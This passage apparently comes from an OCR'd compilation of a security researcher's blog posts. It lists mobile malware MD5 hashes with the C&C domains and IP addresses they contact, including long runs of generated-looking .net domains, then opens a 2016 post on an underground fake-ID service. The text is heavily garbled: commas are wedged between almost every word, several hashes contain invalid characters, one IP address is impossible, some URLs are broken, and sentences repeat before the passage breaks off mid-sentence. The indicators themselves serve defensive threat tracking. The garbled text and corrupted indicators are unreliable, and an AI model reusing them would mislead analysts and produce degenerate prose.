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Related malicious MD5s known to have 
phoned back to the same C &C server IP (art.hornymilfporna.com): 


MD5: ee329ffcd6fe835bfdc0ecla7f033584 


Related malicious MD5s known to have 
phoned back to the same C &C server IP (hornymilfporna.com - 
54.72.9.51; 104.27.188.20; 104.224.124.113): 


MD5: d990fe6ed56e5f087dfc4c1lad09e2591 


MD5: d129b79a68dd362714a4d35f9901c661 


MD5: d74aab1f688c670c172c3767a17c4953 


MD5: 5f8a4de87409b399d262bd0ae0a908d7 


MD5: 189803a93cde9e0c401ac386c154328f 
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Once, executed, a, sample, malware, 
phones, back, to, the, following, C &C, server IPs: 


hxxp://fullset.link 


hxxp://allmodel-pro.com 


hxxp://sso.anbtr.com 


hxxp://xsso.allmodel-pro.com 


hxxp://fullset.info 


hxxp://groupmodel. biz 


Once, executed, a, sample, malware, 
phones, back, to, the, following, C &C, server, IPs: 


212.61.180.100 
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195.22.28.222 


212.61.180.100 


54.72.9.51 


Once, executed, a, sample, malware 
(MD5: 8a81ef6673321bddc557c486bce2a025), phones, back, to, the, 
following, C &C, server, IPs: 


hxxp://cinar.pussyteenx.com/g/getasite/ 
- 8.5.1.44; 46.45.168.84 


hxxp://cinar.pussyteenx.com/z/orap/ 


hxxp://cinar.pussyteenx.com/z/z2/ 


hxxp://cinar.pussyteenx.com/z/z5/ 


5318 


Related, malicious, MD5s, known, to, 
have, phoned, back, to, the, same, C &C, server, IPs 
(cinar.pussyteenx.com - 8.5.1.44; 46.45.168.84): 


MD5: b9a2447a5b292566b4998c5d996f488b 


Related, malicious, MD5s, known, to, 
have, phoned, back, to, the, same, C &C, server, IP 
(cinar.pussyteenx.com - 8.5.1.44; 46.45.168.84): 


MD5: f8205b4b9ae5d8ac8bf7b3996a6be408 


MD5: a73138a8275b68296bfcf0ed39b2665c 


MD5: ff06679eb18932e31f8b05d92a48b4eb 


MD5: 107993dce5417356d40279feb2be0017 


5319 


MD5: d5ed564fd2f4c10e3a26df9342a09545 


Once, executed, a, sample, malware 
(MD5: f8205b4b9ae5d8ac8bf7b3996a6be408), phones, back, to, the, 
following, C &C, server, IPs: 


hxxp://englishmeasure.net 


hxxp://eitherdinner.net 


hxxp://englishdinner.net 


hxxp://eitherafraid.net 


hxxp://englishafraid.net 


hxxp://eithercircle.net 


hxxp://englishcircle.net 


5320 


hxxp://expectwheat.net 


hxxp://becausewheat.net 


hxxp://expectanger.net 


hxxp://becauseanger.net 


hxxp://expectalways.net 


hxxp://becausealways.net 


hxxp://expectforest.net 


hxxp://becauseforest.net 


hxxp://personwheat.net 


hxxp://machinewheat.net 


hxxp://personanger.net 


5321 


hxxp://machineanger.net 


hxxp://personalways.net 


hxxp://machinealways.net 


hxxp://personforest.net 


hxxp://machineforest.net 


hxxp://suddenwheat.net 


hxxp://foreignwheat.net 


hxxp://suddenanger.net 


hxxp://foreignanger.net 


hxxp://suddenalways.net 


5322 


hxxp://foreignalways.net 


hxxp://suddenforest.net 


hxxp://foreignforest.net 


hxxp://whetherwheat.net 


hxxp://rightwheat.net 


hxxp://whetheranger.net 


hxxp://rightanger.net 


hxxp://whetheralways.net 


hxxp://rightalways.net 


hxxp://whetherforest.net 


hxxp://rightforest.net 
5323 


hxxp://figurewheat.net 


hxxp://thoughwheat.net 


hxxp://figureanger.net 


hxxp://thoughanger.net 


hxxp://figurealways.net 


hxxp://thoughalways.net 


hxxp://figureforest.net 


hxxp://thoughforest.net 


hxxp://picturewheat.net 


hxxp://cigarettewheat.net 


5324 


hxxp://pictureanger.net 


hxxp://cigaretteanger.net 


hxxp://picturealways.net 


hxxp://cigarettealways.net 


hxxp://pictureforest.net 


hxxp://cigaretteforest.net 


hxxp://childrenwheat.net 


hxxp://familywheat.net 


hxxp://childrenanger.net 


hxxp://familyanger.net 


hxxp://childrenalways.net 
5325 


hxxp://familyalways.net 


hxxp://childrenforest.net 


hxxp://familyforest.net 


hxxp://eitherwheat.net 


hxxp://englishwheat.net 


hxxp://eitheranger.net 


hxxp://englishanger.net 


hxxp://eitheralways.net 


hxxp://englishalways.net 


hxxp://eitherforest.net 


5326 


hxxp://englishforest.net 


hxxp://expectschool.net 


hxxp://becauseschool.net 


hxxp://expectwhile.net 


hxxp://becausewhile.net 


hxxp://expectquestion.net 


hxxp://becausequestion.net 


hxxp://expecttherefore.net 


hxxp://becausetherefore.net 


hxxp://personschool.net 


hxxp://machineschool.net 


5327 


hxxp://personwhile.net 


hxxp://machinewhile.net 


hxxp://personquestion.net 


hxxp://machinequestion.net 


Once, executed, a, sample, malware 
(MD5: a73138a8275b68296bfcf0ed39b2665c), phones, back, to, the, 
following, C &C, server, IPs: 


hxxp://figurefather.net 


hxxp://thoughfather.net 


hxxp://figureapple.net 


hxxp://thoughapple.net 
5328 


hxxp://figurebuilt.net 


hxxp://thoughbuilt.net 


hxxp://figurecarry.net 


hxxp://thoughcarry.net 


hxxp://picturefather.net 


hxxp://cigarettefather.net 


hxxp://pictureapple.net 


hxxp://cigaretteapple.net 


hxxp://picturebuilt.net 


hxxp://cigarettebuilt.net 


5329 


hxxp://picturecarry.net 


hxxp://cigarettecarry.net 


hxxp://childrenfather.net 


hxxp://familyfather.net 


hxxp://childrenapple.net 


hxxp://familyapple.net 


hxxp://childrenbuilt.net 


hxxp://familybuilt.net 


hxxp://childrencarry.net 


hxxp://familycarry.net 


hxxp://eitherfather.net 
5330 


hxxp://englishfather.net 


hxxp://eitherapple.net 


hxxp://englishapple.net 


hxxp://eitherbuilt.net 


hxxp://englishbuilt.net 


hxxp://eithercarry.net 


hxxp://englishcarry.net 


hxxp://expectmeasure.net 


hxxp://becausemeasure.net 


hxxp://expectdinner.net 


5331 


hxxp://becausedinner.net 


hxxp://expectafraid.net 


hxxp://becauseafraid.net 


hxxp://expectcircle.net 


hxxp://becausecircle.net 


hxxp://personmeasure.net 


hxxp://machinemeasure.net 


hxxp://persondinner.net 


hxxp://machinedinner.net 


hxxp://personafraid.net 


hxxp://machineafraid.net 
5332 


hxxp://personcircle.net 


hxxp://machinecircle.net 


hxxp://suddenmeasure.net 


hxxp://foreignmeasure.net 


hxxp://suddendinner.net 


hxxp://foreigndinner.net 


hxxp://suddenafraid.net 


hxxp://foreignafraid.net 


hxxp://suddencircle.net 


hxxp://foreigncircle.net 


5333 


hxxp://whethermeasure.net 


hxxp://rightmeasure.net 


hxxp://whetherdinner.net 


hxxp://rightdinner.net 


hxxp://whetherafraid.net 


hxxp://rightafraid.net 


hxxp://whethercircle.net 


hxxp://rightcircle.net 


hxxp://figuremeasure.net 


hxxp://thoughmeasure.net 


hxxp://figuredinner.net 
5334 


hxxp://thoughdinner.net 


hxxp://figureafraid.net 


hxxp://thoughafraid.net 


hxxp://figurecircle.net 


hxxp://thoughcircle.net 


hxxp://picturemeasure.net 


hxxp://cigarettemeasure.net 


hxxp://picturedinner.net 


hxxp://cigarettedinner.net 


hxxp://pictureafraid.net 


5335 


hxxp://cigaretteafraid.net 


hxxp://picturecircle.net 


hxxp://cigarettecircle.net 


hxxp://childrenmeasure.net 


hxxp://familymeasure.net 


hxxp://childrendinner.net 


hxxp://familydinner.net 


hxxp://childrenafraid.net 


hxxp://familyafraid.net 


hxxp://childrencircle.net 


hxxp://familycircle.net 
5336 


hxxp://eithermeasure.net 


hxxp://englishmeasure.net 


hxxp://eitherdinner.net 


hxxp://englishdinner.net 


hxxp://eitherafraid.net 


hxxp://englishafraid.net 


hxxp://eithercircle.net 


hxxp://englishcircle.net 


hxxp://expectwheat.net 


hxxp://becausewheat.net 


5337 


hxxp://expectanger.net 


hxxp://becauseanger.net 


hxxp://expectalways.net 


hxxp://becausealways.net 


hxxp://expectforest.net 


hxxp://becauseforest.net 


hxxp://personwheat.net 


hxxp://machinewheat.net 


hxxp://personanger.net 


hxxp://machineanger.net 


hxxp://personalways.net 
5338 


hxxp://machinealways.net 


hxxp://personforest.net 


hxxp://machineforest.net 


hxxp://suddenwheat.net 


hxxp://foreignwheat.net 


hxxp://suddenanger.net 


hxxp://foreignanger.net 


hxxp://suddenalways.net 


hxxp://foreignalways.net 


hxxp://suddenforest.net 


5339 


hxxp://foreignforest.net 


hxxp://whetherwheat.net 


hxxp://rightwheat.net 


hxxp://whetheranger.net 


hxxp://rightanger.net 


hxxp://whetheralways.net 


hxxp://rightalways.net 


hxxp://whetherforest.net 


hxxp://rightforest.net 


hxxp://figurewheat.net 


hxxp://thoughwheat.net 
5340 


hxxp://figureanger.net 


Once, executed, a, sample, malware, phones, back, to the, following, C &C, server, IPs: 


hxxp://195.22.28.197 
hxxp://195.22.28.199 
hxxp://184.168.221.55 
hxxp://208.100.26.234 
hxxp://184.168.221.35 
hxxp://98.124.243.42 
hxxp://208.100.26.234 
hxxp://184.168.221.104 
hxxp://173.236.80.218 
hxxp://195.22.26.248 
hxxp://195.22.26.248 
hxxp://195.22.28.197 
hxxp://208.100.26.234 
hxxp://8.5.1.44 


hxxp://98.130.238.135 


Once, executed, a, sample, malware 


(MD5: ff06679eb18932e31f8b05d92a48b4eb), phones, back, to, the, 


5341 


following, C &C, server, IPs: 


hxxp://strengthbecame.net 


hxxp://stillbecame.net 


hxxp://strengthcontain.net 


hxxp://stillcontain.net 


hxxp://strengthbasket.net 


hxxp://stillbasket.net 


hxxp://movementsettle.net 


hxxp://outsidesettle.net 


hxxp://movementlanguage.net 


hxxp://outsidelanguage.net 
5342 


hxxp://movementdevice.net 


hxxp://outsidedevice.net 


hxxp://movementbefore.net 


hxxp://outsidebefore.net 


hxxp://buildingsettle.net 


hxxp://eveningsettle.net 


hxxp://buildinglanguage.net 


hxxp://eveninglanguage.net 


hxxp://buildingdevice.net 


hxxp://eveningdevice.net 


5343 


hxxp://buildingbefore.net 


hxxp://eveningbefore.net 


hxxp://storesettle.net 


hxxp://mightsettle.net 


hxxp://storelanguage.net 


hxxp://mightlanguage.net 


hxxp://storedevice.net 


hxxp://mightdevice.net 


hxxp://storebefore.net 


hxxp://mightbefore.net 


hxxp://doctorsettle.net 
5344 


hxxp://prettysettle.net 


hxxp://doctorlanguage.net 


hxxp://prettylanguage.net 


hxxp://doctordevice.net 


hxxp://prettydevice.net 


hxxp://doctorbefore.net 


hxxp://prettybefore.net 


hxxp://fellowsettle.net 


hxxp://doublesettle.net 


hxxp://fellowlanguage.net 


5345 


hxxp://doublelanguage.net 


hxxp://fellowdevice.net 


hxxp://doubledevice.net 


hxxp://fellowbefore.net 


hxxp://doublebefore.net 


hxxp://brokensettle.net 


hxxp://resultsettle.net 


hxxp://brokenlanguage.net 


hxxp://resultlanguage.net 


hxxp://brokendevice.net 


hxxp://resultdevice.net 
5346 


hxxp://brokenbefore.net 


hxxp://resultbefore.net 


hxxp://preparesettle.net 


hxxp://desiresettle.net 


hxxp://preparelanguage.net 


hxxp://desirelanguage.net 


hxxp://preparedevice.net 


hxxp://desiredevice.net 


hxxp://preparebefore.net 


hxxp://desirebefore.net 


5347 


hxxp://strengthsettle.net 


hxxp://stillsettle.net 


hxxp://strengthlanguage.net 


hxxp://stilllanguage.net 


hxxp://strengthdevice.net 


hxxp://stilldevice.net 


hxxp://strengthbefore.net 


hxxp://stillbefore.net 


hxxp://movementfound.net 


hxxp://outsidefound.net 


hxxp://movementspring.net 
5348 


hxxp://outsidespring.net 


hxxp://movementsuccess.net 


hxxp://outsidesuccess.net 


hxxp://movementbanker.net 


hxxp://outsidebanker.net 


hxxp://buildingfound.net 


hxxp://eveningfound.net 


hxxp://buildingspring.net 


hxxp://eveningspring.net 


hxxp://buildingsuccess.net 


5349 


hxxp://eveningsuccess.net 


hxxp://buildingbanker.net 


hxxp://eveningbanker.net 


hxxp://storefound.net 


hxxp://mightfound.net 


hxxp://storespring.net 


hxxp://mightspring.net 


hxxp://storesuccess.net 


hxxp://mightsuccess.net 


hxxp://storebanker.net 


hxxp://mightbanker.net 
5350 


hxxp://doctorfound.net 


hxxp://prettyfound.net 


hxxp://doctorspring.net 


hxxp://prettyspring.net 


hxxp://doctorsuccess.net 


hxxp://prettysuccess.net 


hxxp://doctorbanker.net 


hxxp://prettybanker.net 


hxxp://fellowfound.net 


hxxp://doublefound.net 


5351 


hxxp://fellowspring.net 


hxxp://doublespring.net 


hxxp://fellowsuccess.net 


hxxp://doublesuccess.net 


hxxp://fellowbanker.net 


hxxp://doublebanker.net 


hxxp://brokenfound.net 


hxxp://resultfound.net 


hxxp://brokenspring.net 


hxxp://resultspring.net 


hxxp://brokensuccess.net 
5352 


hxxp://resultsuccess.net 


hxxp://brokenbanker.net 


hxxp://resultbanker.net 


hxxp://preparefound.net 


hxxp://desirefound.net 


hxxp://preparespring.net 


hxxp://desirespring.net 


hxxp://preparesuccess.net 


hxxp://desiresuccess.net 


hxxp://preparebanker.net 


5353 


hxxp://desirebanker.net 


hxxp://strengthfound.net 


hxxp://stillfound.net 


hxxp://strengthspring.net 


hxxp://stillspring.net 


hxxp://strengthsuccess.net 


hxxp://stillsuccess.net 


hxxp://strengthbanker.net 


hxxp://stillbanker.net 


hxxp://movementairplane.net 


hxxp://outsideairplane.net 
5354 


hxxp://movementstraight.net 


hxxp://outsidestraight.net 


hxxp://movementguard.net 


hxxp://outsideguard.net 


hxxp://movementfence.net 


hxxp://outsidefence.net 


hxxp://buildingairplane.net 


hxxp://eveningairplane.net 


hxxp://buildingstraight.net 


hxxp://eveningstraight.net 


5355 


hxxp://buildingguard.net 


hxxp://eveningguard.net 


hxxp://buildingfence.net 


hxxp://eveningfence.net 


hxxp://storeairplane.net 


hxxp://mightairplane.net 


hxxp://storestraight.net 


hxxp://mightstraight.net 


hxxp://storeguard.net 


hxxp://mightguard.net 


Once, executed, a, sample, malware, phones, back, to, the, following, C &C, server, IPs: 
5356 


hxxp://98.124.243.39 
hxxp://195.22.28.198 
hxxp://216.239.34.21 
hxxp://208.100.26.234 
hxxp://195.22.26.248 
hxxp://195.22.28.197 
hxxp://208.100.26.234 
hxxp://50.63.202.6 
hxxp://54.207.35.233 
hxxp://8.5.1.44 
hxxp://74.208.236.66 
hxxp://81.21.76.62 
hxxp://50.63.202.55 
hxxp://208.91.197.25 
hxxp://5.2.189.251 


hxxp://195.22.28.198 


Once, executed, a, sample, malware 
(MD5: 107993dce5417356d40279feb2be0017), phones, back, to, the, 
following, C &C, server, IPs: 


hxxp://movementindustry.net 
5357 


hxxp://outsideindustry.net 


hxxp://movementbecame.net 


hxxp://outsidebecame.net 


hxxp://movementcontain.net 


hxxp://outsidecontain.net 


hxxp://movementbasket.net 


hxxp://outsidebasket.net 


hxxp://buildingindustry.net 


hxxp://eveningindustry.net 


hxxp://buildingbecame.net 


5358 


hxxp://eveningbecame.net 


hxxp://buildingcontain.net 


hxxp://eveningcontain.net 


hxxp://buildingbasket.net 


hxxp://eveningbasket.net 


hxxp://storeindustry.net 


hxxp://mightindustry.net 


hxxp://storebecame.net 


hxxp://mightbecame.net 


hxxp://storecontain.net 


hxxp://mightcontain.net 


5359 


hxxp://storebasket.net 


hxxp://mightbasket.net 


hxxp://doctorindustry.net 


hxxp://prettyindustry.net 


hxxp://doctorbecame.net 


hxxp://prettybecame.net 


hxxp://doctorcontain.net 


hxxp://prettycontain.net 


hxxp://doctorbasket.net 


hxxp://prettybasket.net 


5360 


hxxp://fellowindustry.net 


hxxp://doubleindustry.net 


hxxp://fellowbecame.net 


hxxp://doublebecame.net 


hxxp://fellowcontain.net 


hxxp://doublecontain.net 


hxxp://fellowbasket.net 


hxxp://doublebasket.net 


hxxp://brokenindustry.net 


hxxp://resultindustry.net 


hxxp://brokenbecame.net 


5361 


hxxp://resultbecame.net 


hxxp://brokencontain.net 


hxxp://resultcontain.net 


hxxp://brokenbasket.net 


hxxp://resultbasket.net 


hxxp://prepareindustry.net 


hxxp://desireindustry.net 


hxxp://preparebecame.net 


hxxp://desirebecame.net 


hxxp://preparecontain.net 


5362 


hxxp://desirecontain.net 


hxxp://preparebasket.net 


hxxp://desirebasket.net 


hxxp://strengthindustry.net 


hxxp://stillindustry.net 


hxxp://strengthbecame.net 


hxxp://stillbecame.net 


hxxp://strengthcontain.net 


hxxp://stillcontain.net 


hxxp://strengthbasket.net 


hxxp://stillbasket.net 


5363 


hxxp://movementsettle.net 


hxxp://outsidesettle.net 


hxxp://movementlanguage.net 


hxxp://outsidelanguage.net 


hxxp://movementdevice.net 


hxxp://outsidedevice.net 


hxxp://movementbefore.net 


hxxp://outsidebefore.net 


hxxp://buildingsettle.net 


hxxp://eveningsettle.net 


5364 


hxxp://buildinglanguage.net 


hxxp://eveninglanguage.net 


hxxp://buildingdevice.net 


hxxp://eveningdevice.net 


hxxp://buildingbefore.net 


hxxp://eveningbefore.net 


hxxp://storesettle.net 


hxxp://mightsettle.net 


hxxp://storelanguage.net 


hxxp://mightlanguage.net 


hxxp://storedevice.net 


5365 


hxxp://mightdevice.net 


hxxp://storebefore.net 


hxxp://mightbefore.net 


hxxp://doctorsettle.net 


hxxp://prettysettle.net 


hxxp://doctorlanguage.net 


hxxp://prettylanguage.net 


hxxp://doctordevice.net 


hxxp://prettydevice.net 


hxxp://doctorbefore.net 


5366 


hxxp://prettybefore.net 


fhxxp://ellowsettle.net 


hxxp://doublesettle.net 


hxxp://fellowlanguage.net 


hxxp://doublelanguage.net 


fhxxp://ellowdevice.net 


hxxp://doubledevice.net 


hxxp://fellowbefore.net 


hxxp://doublebefore.net 


hxxp://brokensettle.net 


hxxp://resultsettle.net 
5367 


hxxp://brokenlanguage.net 


hxxp://resultlanguage.net 


hxxp://brokendevice.net 


hxxp://resultdevice.net 


hxxp://brokenbefore.net 


hxxp://resultbefore.net 


hxxp://preparesettle.net 


hxxp://desiresettle.net 


hxxp://preparelanguage.net 


hxxp://desirelanguage.net 


5368 


hxxp://preparedevice.net 


hxxp://desiredevice.net 


hxxp://preparebefore.net 


hxxp://desirebefore.net 


hxxp://strengthsettle.net 


hxxp://stillsettle.net 


hxxp://strengthlanguage.net 


hxxp://stilllanguage.net 


hxxp://strengthdevice.net 


hxxp://stilldevice.net 


hxxp://strengthbefore.net 
5369 


hxxp://stillbefore.net 


hxxp://movementfound.net 


hxxp://outsidefound.net 


hxxp://movementspring.net 


hxxp://outsidespring.net 


hxxp://movementsuccess.net 


hxxp://outsidesuccess.net 


hxxp://movementbanker.net 


hxxp://outsidebanker.net 


hxxp://buildingfound.net 


5370 


hxxp://eveningfound.net 


hxxp://buildingspring.net 


hxxp://eveningspring.net 


hxxp://buildingsuccess.net 


hxxp://eveningsuccess.net 


hxxp://buildingbanker.net 


hxxp://eveningbanker.net 


hxxp://storefound.net 


hxxp://mightfound.net 


hxxp://storespring.net 


hxxp://mightspring.net 
5371 


hxxp://storesuccess.net 


hxxp://mightsuccess.net 


hxxp://storebanker.net 


hxxp://mightbanker.net 


hxxp://doctorfound.net 


hxxp://prettyfound.net 


hxxp://doctorspring.net 


hxxp://prettyspring.net 


hxxp://doctorsuccess.net 


hxxp://prettysuccess.net 


5372 


hxxp://doctorbanker.net 


hxxp://prettybanker.net 


hxxp://fellowfound.net 


hxxp://doublefound.net 


hxxp://fellowspring.net 


hxxp://doublespring.net 


hxxp://fellowsuccess.net 


hxxp://doublesuccess.net 


hxxp://fellowbanker.net 


hxxp://doublebanker.net 


hxxp://brokenfound.net 


5373 


hxxp://resultfound.net 


Once, executed, a, sample, malware, phones, back, to, the, following, C &C, server, IPs: 
hxxp://207.148.248.143 
hxxp://50.63.202.56 
hxxp://208.100.26.234 
hxxp://195.22.28.197 
hxxp://208.100.26.234 
hxxp://98.124.243.39 
hxxp://195.22.28.199 
hxxp://216.239.32.21 
hxxp://208.100.26.234 
hxxp://195.22.26.248 
hxxp://195.22.28.197 
hxxp://208.100.26.234 
hxxp://50.63.202.6 
hxxp://54.207.35.233 
hxxp://8.5.1.44 


hxxp://74.208.236.66 


5374 


Once, executed, a, sample, malware 
(MD5: d5ed564fd2f4c10e3a26df9342a09545), phones, back, to, the, 
following, C &C, server, IPs: 


hxxp://desiredress.net 


hxxp://strengthcatch.net 


hxxp://stillcatch.net 


hxxp://strengtheearly.net 


hxxp://stilleearly.net 


hxxp://strengthpublic.net 


hxxp://stillpublic.net 


hxxp://strengthdress.net 


hxxp://stilldress.net 


5375 


hxxp://expectlength.net 


hxxp://becauselength.net 


hxxp://expectnotice.net 


hxxp://becausenotice.net 


hxxp://expectindeed.net 


hxxp://becauseindeed.net 


hxxp://expectduring.net 


hxxp://becauseduring.net 


hxxp://personlength.net 


hxxp://machinelength.net 


hxxp://personnotice.net 
5376 


hxxp://machinenotice.net 


hxxp://personindeed.net 


hxxp://machineindeed.net 


hxxp://personduring.net 


hxxp://machineduring.net 


hxxp://suddenlength.net 


hxxp://foreignlength.net 


hxxp://suddennotice.net 


hxxp://foreignnotice.net 


hxxp://suddenindeed.net 


5377 


hxxp://foreignindeed.net 


hxxp://suddenduring.net 


hxxp://foreignduring.net 


hxxp://whetherlength.net 


hxxp://rightlength.net 


hxxp://whethernotice.net 


hxxp://rightnotice.net 


hxxp://whetherindeed.net 


hxxp://rightindeed.net 


hxxp://whetherduring.net 


hxxp://rightduring.net 
5378 


hxxp://figurelength.net 


hxxp://thoughlength.net 


hxxp://figurenotice.net 


hxxp://thoughnotice.net 


hxxp://figureindeed.net 


hxxp://thoughindeed.net 


hxxp://figureduring.net 


hxxp://thoughduring.net 


hxxp://picturelength.net 


hxxp://cigarettelength.net 
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hxxp://picturenotice.net 


hxxp://cigarettenotice.net 


hxxp://pictureindeed.net 


hxxp://cigaretteindeed.net 


hxxp://pictureduring.net 


hxxp://cigaretteduring.net 


hxxp://childrenlength.net 


hxxp://familylength.net 


hxxp://childrennotice.net 


hxxp://familynotice.net 


hxxp://childrenindeed.net 
5380 


hxxp://familyindeed.net 


hxxp://childrenduring.net 


hxxp://familyduring.net 


hxxp://eitherlength.net 


hxxp://englishlength.net 


hxxp://eithernotice.net 


hxxp://englishnotice.net 


hxxp://eitherindeed.net 


hxxp://englishindeed.net 


hxxp://eitherduring.net 
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hxxp://englishduring.net 


hxxp://expectclear.net 


hxxp://becauseclear.net 


hxxp://expectgeneral.net 


hxxp://becausegeneral.net 


hxxp://expectinclude.net 


hxxp://becauseinclude.net 


hxxp://expectnorth.net 


hxxp://becausenorth.net 


hxxp://personclear.net 


hxxp://machineclear.net 
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hxxp://persongeneral.net 


hxxp://machinegeneral.net 


hxxp://personinclude.net 


hxxp://machineinclude.net 


hxxp://personnorth.net 


hxxp://machinenorth.net 


hxxp://suddenclear.net 


hxxp://foreignclear.net 


hxxp://suddengeneral.net 


hxxp://foreigngeneral.net 
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hxxp://suddeninclude.net 


hxxp://foreigninclude.net 


hxxp://suddennorth.net 


hxxp://foreignnorth.net 


hxxp://whetherclear.net 


hxxp://rightclear.net 


hxxp://whethergeneral.net 


hxxp://rightgeneral.net 


hxxp://whetherinclude.net 


hxxp://rightinclude.net 


hxxp://whethernorth.net 
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hxxp://rightnorth.net 


hxxp://figureclear.net 


hxxp://thoughclear.net 


hxxp://figuregeneral.net 


hxxp://thoughgeneral.net 


hxxp://figureinclude.net 


hxxp://thoughinclude.net 


hxxp://figurenorth.net 


hxxp://thoughnorth.net 


hxxp://pictureclear.net 
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hxxp://cigaretteclear.net 


hxxp://picturegeneral.net 


hxxp://cigarettegeneral.net 


hxxp://pictureinclude.net 


hxxp://cigaretteinclude.net 


hxxp://picturenorth.net 


hxxp://cigarettenorth.net 


hxxp://childrenclear.net 


hxxp://familyclear.net 


hxxp://childrengeneral.net 


hxxp://familygeneral.net 
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hxxp://childreninclude.net 


hxxp://familyinclude.net 


hxxp://childrennorth.net 


hxxp://familynorth.net 


hxxp://eitherclear.net 


hxxp://englishclear.net 


hxxp://eithergeneral.net 


hxxp://englishgeneral.net 


hxxp://eitherinclude.net 


hxxp://englishinclude.net 
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hxxp://eithernorth.net 


Once, executed, a, sample, malware, phones, back, to, the, following, C &C, server, IPs: 
hxxp://195.22.28.197 

hxxp://208.100.26.234 

hxxp://8.5.1.44 

hxxp://208.100.26.234 

hxxp://195.22.28.199 

hxxp://162.255.119.249 

hxxp://208.100.26.234 


hxxp://98.124.243.44 


Once, executed, a, sample, malware 
(MD5: 789cb05effb586bda98e87e7 1e340c39), phones, back, to, the, 
following, C &C, server, IPs: 


hxxp://diyar.collegegirlteen.com/g/getasite/ 
- 46.45.168.84 


hxxp://diyar.collegegirlteen.com/z/orap/ 


hxxp://diyar.collegegirlteen.com/z/z2/ 
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hxxp://diyar.collegegirlteen.com/z/z5/ 


Related, malicious, MD5s, known, to, 
have, phoned, back, to, the, following, C &C, server, IPs: 


MD5: acd62483446c7ed057f312784bfddd61 


Once, executed, a, sample, malware 
(MD5: 505e4d58c53d47245aa89c0fd7cded83), phones, back, to, the, 
following, C &C, server, IPs: 


hxxp://van.cowteen.com/g/getasite/ - 
46.45.168.84 


hxxp://van.cowteen.com/z/orap/ 


hxxp://van.cowteen.com/z/z2/ 
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hxxp://van.cowteen.com/z/z5/ 


Related. malicious, MD5s, known, to, 
have, phoned, back, to, the, same, C &C, server, IP: 


MD5: 13f2e7b3141b84666e0209e140663ef2 


Once, executed, a, sample, malware, 
phones, back, to, the, following, C &C, server, IPs: 


hxxp://w.bestmobile.mobi/ - 
104.31.66.169; 104.31.67.169; 104.28.0.226; 104.28.1.226 


Related, malicious, MD5s, known, to, 
have, phoned, back, to, the, same, C &C, server, IPs: 
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MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


92bd8e7e58816bcb14f9dcbf839178ca 


1ee44596b174edb55c4bc497c1fe5f34 


443f732e406b3d96e53184917525el14a 


a24fad894881b746c48420b019a225cf 


7c8a8f96c5b31e6ccae936ddc5226c91 


Once, executed, a, sample, malware 
(MD5: a24fad894881b746c48420b019a225cf), phones, back, to, the, 
following, C &C, server, IPs: 


hxxp://au.umeng.co - 140.205.170.6; 


140.205.230.45; 140.205.250.511; 140.205.134.243; 140.205.155.238; 


110.173.196.195; 211.151.139.211; 211.151.139.210 


hxxp://au.umeng.com/api/check _app update 
- 140.205.134.243; 140.205.170.6; 140.205.250.51; 140.205.230.45; 
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140.205.155.238; 110.173.196.195; 211.151.151.6; 211.151.139.210; 


211.151.139.211 


Related, malicious, MD5s, known, to, 

have, phoned, back, to, the, same, C &C, server, IP (au.umeng.co - 

140.205.170.6; 140.205.230.45; 140.205.250.51; 140.205.134.243; 140.205.155.238; 
110.173.196.195; 

211.151.139.211; 211.151.139.210): 


MD5: 65a6fle29b09ba7caa98a9763593aedb 


MD5: 102111b9024b71f6ab584d22abdbc589 


MD5: 9ad137e51a5b6b2288c774a74a7e80da 


MD5: a70595e99b3471216404400b736eaf7c 


MD5: 3d3360250c96dff33e177121113b5a3f 
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Once, executed, a, sample, malware, 
phones, back, to, the, same, C &C, server, IPs: 


hxxp://211.139.191.223 


hxxp://221.179.35.113 


Once, executed, a, sample, malware, 
phones, back, to, the, same, C &C, server, IPs: 


hxxp://115.28.174.189/hft/rq.php 


Related, malicious, MD5s, known, to, 
have, phoned, back, to, the, same, C &C, server, IPs: 
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MD5: c0464c5193dec0980a07fa2e50deffbl 


We'll, continue, monitoring, the, 
market, segment, for, mobile, malware, and, post, updates, as, soon, 
as, new, developments, take, place. 


12.6 December 


12.6.1 New Service Offerring Fake Documents on Demand Spotted in the Wild 
(2016-12-21 14:08) 


In, a, cybercrime, ecosystem, dominated, by, multiple, underground, market, participants, 
and, hundreds, of, fraudulent, propositions, cybercriminals, continue, successfully, monetizing, 
access, to, malware-infected, hosts, for, the, purpose, of, earning, fraudulent, revenue, in, 
the, process, largely, relying, on, a, set, of, DIY (do-it-yourself), managed, cybercrime-friendly, 
services, successfully, monetizing, access, to, malware-infected, hosts, for, the, purpose, of, 
earning, fraudulent, revenue, in, the, process. 


We've recently, intercepted, a, newly, launched, managed, on, demand, underground, 
market, type, of, service, proposition, offering, access, to, fake, documents, and, IDs, suc- 
cessfully, empowering, novice, cybercriminals, with, the, necessary, tactics, techniques, and, 
procedures, for, the, purpose, of, commiting, fraudulent, activities, while, earning, fraudulent, 
revenue, in, the, process, successfully, monetizing, access, to, malware-infected, hosts, while, 
earning, fraudulent, revenue, in, the, process. 


In, this, post, we’ll, profile, the, service, provide, actionable, intelligence, on, the, infras- 
tructure, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, 
cybercriminals, behind, it. 
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In, a, cybercrime, ecystem, populated, by, hundreds, of, fraudulent, propositions, cyber- 
criminals, continue, actively, launching, managed, cybercrime-friendly, services, successfully, 
monetizing, access, to, malware-infected, hosts, while, earning, fraudulent, revenue, in, 
the, process. Largely, relying, on, a, diverse, set, of, tactics, techniques, and, procedures, 
cybercriminals, continue, successfully, launching, managed, cybercrime-friendly, services, 
successfully, empowering, novice, cybercriminals with, the, necessary, tactics, techniques, 
and, procedures, for, the, purpose, of, earning, fraudulet, revenue, in, the, process, while, 
successfully, monetizing, access, to, malware-infected hosts, successfully, earning, fraudulent, 
revenue, in, the, process. 


The, market, segment, for, fake, IDs, and, fake, documents, continues, flourishing, largely, 
thanks, to, a, diverse, set, of, underground, market, segment, cybercrime-friendly, managed, 
services, successfully, empowering, novice, cybercriminals, with, the, necessary, tactics, tech- 
niques, and, procedures, to, fruther, commit, cybercrime, while, earning, fraudulent, revenue, 
in, the, process, while, successfully, monetizing, access, to, malware-infected, hosts. In, a, 
market, segment, dominated, by, commiditized, underground, market, cybercrime-friendly, 
propositions, cybercriminals, continue, actively, populating, the, market, segment, for, fake, 
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IDs, and, fake, documents, with, hundreds, of, fraudulent, propositions, successfully, empow- 
ering, novice, cybercriminals, with, the, necessary, tactics, techniques, and, procedures, to, 
further, commit, fraudulent, activity, while, earning, fraudulent, revenue, in, the, process. 


We'll, continue, monitoring, the, market, segment, for, fake, documents, and, IDs, and, 
